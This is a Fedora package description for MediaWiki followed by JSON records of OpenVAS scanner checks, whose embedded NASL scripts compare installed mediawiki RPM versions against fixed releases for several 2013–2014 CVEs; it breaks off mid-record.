MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers. This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.23.2/README.RPM. Remember to remove the config dir after completing the configuration.
{"openvas": [{"lastseen": "2019-05-29T18:37:11", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-08-27T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-9548", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5243", "CVE-2014-5241", "CVE-2014-5242", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868126", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868126", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-9548\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868126\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-27 05:54:27 +0200 (Wed, 27 Aug 2014)\");\n script_cve_id(\"CVE-2014-5241\", \"CVE-2014-5242\", \"CVE-2014-5243\", \"CVE-2014-2853\",\n \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-9548\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-9548\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137048.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.2~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-08-27T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-9583", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5243", "CVE-2014-5241", "CVE-2014-5242", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868133", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868133", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-9583\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868133\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-27 05:55:03 +0200 (Wed, 27 Aug 2014)\");\n script_cve_id(\"CVE-2014-5241\", \"CVE-2014-5242\", \"CVE-2014-5243\", \"CVE-2014-2853\",\n \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-9583\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-9583\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137052.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.2~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:25", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-07-07T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-7779", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867954", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867954", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-7779\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867954\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-07 14:57:00 +0530 (Mon, 07 Jul 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-7779\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-7779\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135090.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.11~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:39", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-6961", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867892", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867892", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-6961\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867892\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-17 10:01:26 +0530 (Tue, 17 Jun 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-6961\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-6961\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134116.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.10~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:20", "description": "Check for the Version of mediawiki", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-5691", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:867776", "href": "http://plugins.openvas.org/nasl.php?oid=867776", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-5691\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867776);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-12 09:10:21 +0530 (Mon, 12 May 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-5691\");\n\n tag_insight = \"MediaWiki is the software used for Wikipedia and the other Wikimedia\nFoundation websites. Compared to other wikis, it has an excellent\nrange of features and support for high-traffic websites using multiple\nservers\n\nThis package supports wiki farms. 
Read the instructions for creating wiki\ninstances under /usr/share/doc/mediawiki-1.21.9/README.RPM.\nRemember to remove the config dir after completing the configuration.\n\";\n\n tag_affected = \"mediawiki on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-5691\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-May/132602.html\");\n script_summary(\"Check for the Version of mediawiki\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.9~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:15", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-07-07T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-7805", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": 
"2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867951", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867951", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-7805\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867951\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-07 12:36:02 +0530 (Mon, 07 Jul 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-7805\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated 
package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-7805\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135086.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.11~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-6962", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867858", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867858", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-6962\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# 
Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867858\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-17 09:52:37 +0530 (Tue, 17 Jun 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-6962\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-6962\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134032.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for 
the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.10~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:57", "description": "Check for the Version of mediawiki", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-5684", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:867788", "href": "http://plugins.openvas.org/nasl.php?oid=867788", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-5684\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867788);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-12 09:11:11 +0530 (Mon, 12 May 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-5684\");\n\n tag_insight = \"MediaWiki is the software used for Wikipedia and the other Wikimedia\nFoundation websites. Compared to other wikis, it has an excellent\nrange of features and support for high-traffic websites using multiple\nservers\n\nThis package supports wiki farms. 
Read the instructions for creating wiki\ninstances under /usr/share/doc/mediawiki/README.RPM.\nRemember to remove the config dir after completing the configuration.\n\";\n\n tag_affected = \"mediawiki on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-5684\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-May/132655.html\");\n script_summary(\"Check for the Version of mediawiki\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.9~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-02-04T18:49:48", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-5691", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", 